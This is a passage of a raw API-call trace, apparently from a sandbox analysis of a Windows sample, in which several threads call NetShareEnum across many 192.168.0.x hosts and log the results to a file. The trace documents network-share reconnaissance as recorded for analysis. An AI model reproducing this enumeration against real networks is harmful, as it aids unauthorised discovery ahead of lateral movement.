lpUsedDefaultChar=0x0) returned 1 [0088.972] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.972] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5b9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.972] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.972] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.972] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x5b9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5b9fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.976] NetShareEnum (in: servername="\\\\192.168.0.45", level=0x1, bufptr=0x5b9fedc, prefmaxlen=0xffffffff, entriesread=0x5b9fed4, totalentries=0x5b9fed0, resume_handle=0x5b9fecc | out: bufptr=0x5b9fedc, entriesread=0x5b9fed4, totalentries=0x5b9fed0, resume_handle=0x5b9fecc) returned 0x35 [0144.292] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.97", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.292] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.97", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.97", lpUsedDefaultChar=0x0) returned 14 [0144.292] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5b9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.292] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.292] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.295] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5b9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.295] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.295] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.295] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x5b9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5b9fc54*=0x10, lpOverlapped=0x0) returned 1 [0144.296] NetShareEnum (in: servername="\\\\192.168.0.97", level=0x1, bufptr=0x5b9fedc, prefmaxlen=0xffffffff, entriesread=0x5b9fed4, totalentries=0x5b9fed0, resume_handle=0x5b9fecc | out: bufptr=0x5b9fedc, entriesread=0x5b9fed4, totalentries=0x5b9fed0, resume_handle=0x5b9fecc) returned 0x35 [0178.305] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.165", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.305] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.165", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.165", lpUsedDefaultChar=0x0) returned 15 [0178.306] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5b9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.306] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.306] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.306] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5b9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.306] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.306] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.306] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x5b9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5b9fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.312] NetShareEnum (in: servername="\\\\192.168.0.165", level=0x1, bufptr=0x5b9fedc, prefmaxlen=0xffffffff, entriesread=0x5b9fed4, totalentries=0x5b9fed0, resume_handle=0x5b9fecc | out: bufptr=0x5b9fedc, entriesread=0x5b9fed4, totalentries=0x5b9fed0, resume_handle=0x5b9fecc) returned 0x35 [0211.207] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.239", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.207] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.239", cchWideChar=15, lpMultiByteStr=0x1e8318c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.239", lpUsedDefaultChar=0x0) returned 15 [0211.207] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x5b9fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5b9fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.355] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5b9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.355] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.355] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.355] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5b9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.355] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.355] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.355] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x5b9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5b9fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.361] NetShareEnum (in: servername="\\\\192.168.0.239", level=0x1, bufptr=0x5b9fedc, prefmaxlen=0xffffffff, entriesread=0x5b9fed4, totalentries=0x5b9fed0, resume_handle=0x5b9fecc | out: bufptr=0x5b9fedc, entriesread=0x5b9fed4, totalentries=0x5b9fed0, resume_handle=0x5b9fecc) returned 0x35 [0258.075] SetEvent (hEvent=0x1dc) returned 1 [0258.075] RtlExitUserThread (Status=0x0) Thread: id = 67 os_tid = 0xcb4 [0088.977] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.46", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.977] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.46", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.46", lpUsedDefaultChar=0x0) returned 14 [0088.977] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5cdec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.977] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.977] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.977] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5cdec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.977] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.977] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.977] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x5cdfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5cdfc54*=0x10, lpOverlapped=0x0) returned 1 [0088.984] NetShareEnum (in: servername="\\\\192.168.0.46", level=0x1, bufptr=0x5cdfedc, prefmaxlen=0xffffffff, entriesread=0x5cdfed4, totalentries=0x5cdfed0, resume_handle=0x5cdfecc | out: bufptr=0x5cdfedc, entriesread=0x5cdfed4, totalentries=0x5cdfed0, resume_handle=0x5cdfecc) returned 0x35 [0144.488] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.116", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.488] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.116", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.116", lpUsedDefaultChar=0x0) returned 15 [0144.488] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5cdec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.488] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.488] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.488] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5cdec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.488] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.488] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.488] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x5cdfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5cdfc54*=0x11, lpOverlapped=0x0) returned 1 [0144.492] NetShareEnum (in: servername="\\\\192.168.0.116", level=0x1, bufptr=0x5cdfedc, prefmaxlen=0xffffffff, entriesread=0x5cdfed4, totalentries=0x5cdfed0, resume_handle=0x5cdfecc | out: bufptr=0x5cdfedc, entriesread=0x5cdfed4, totalentries=0x5cdfed0, resume_handle=0x5cdfecc) returned 0x35 [0178.218] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.153", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.218] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.153", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.153", lpUsedDefaultChar=0x0) returned 15 [0178.218] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5cdec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.218] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.218] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.218] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5cdec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.218] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.218] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.218] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x5cdfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5cdfc54*=0x11, lpOverlapped=0x0) returned 1 [0178.222] NetShareEnum (in: servername="\\\\192.168.0.153", level=0x1, bufptr=0x5cdfedc, prefmaxlen=0xffffffff, entriesread=0x5cdfed4, totalentries=0x5cdfed0, resume_handle=0x5cdfecc | out: bufptr=0x5cdfedc, entriesread=0x5cdfed4, totalentries=0x5cdfed0, resume_handle=0x5cdfecc) returned 0x35 [0211.208] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.241", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.208] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.241", cchWideChar=15, lpMultiByteStr=0x1e831cc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.241", lpUsedDefaultChar=0x0) returned 15 [0211.208] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x5cdfc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5cdfc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.366] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5cdec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.366] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.366] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.366] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5cdec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.366] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.366] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.366] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x5cdfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5cdfc54*=0x11, lpOverlapped=0x0) returned 1 [0211.369] NetShareEnum (in: servername="\\\\192.168.0.241", level=0x1, bufptr=0x5cdfedc, prefmaxlen=0xffffffff, entriesread=0x5cdfed4, totalentries=0x5cdfed0, resume_handle=0x5cdfecc | out: bufptr=0x5cdfedc, entriesread=0x5cdfed4, totalentries=0x5cdfed0, resume_handle=0x5cdfecc) returned 0x35 [0258.076] SetEvent (hEvent=0x1dc) returned 1 [0258.076] RtlExitUserThread (Status=0x0) Thread: id = 68 os_tid = 0xcb8 [0088.985] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.47", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.985] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.47", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.47", lpUsedDefaultChar=0x0) returned 14 [0088.985] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5e1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.985] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.985] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.985] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5e1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.985] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.985] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.985] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x5e1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5e1fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.990] NetShareEnum (in: servername="\\\\192.168.0.47", level=0x1, bufptr=0x5e1fedc, prefmaxlen=0xffffffff, entriesread=0x5e1fed4, totalentries=0x5e1fed0, resume_handle=0x5e1fecc | out: bufptr=0x5e1fedc, entriesread=0x5e1fed4, totalentries=0x5e1fed0, resume_handle=0x5e1fecc) returned 0x35 [0144.407] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.108", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.407] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.108", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.108", lpUsedDefaultChar=0x0) returned 15 [0144.407] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5e1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.407] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.407] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.407] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5e1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.407] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.407] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.407] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x5e1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5e1fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.411] NetShareEnum (in: servername="\\\\192.168.0.108", level=0x1, bufptr=0x5e1fedc, prefmaxlen=0xffffffff, entriesread=0x5e1fed4, totalentries=0x5e1fed0, resume_handle=0x5e1fecc | out: bufptr=0x5e1fedc, entriesread=0x5e1fed4, totalentries=0x5e1fed0, resume_handle=0x5e1fecc) returned 0x35 [0178.254] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, 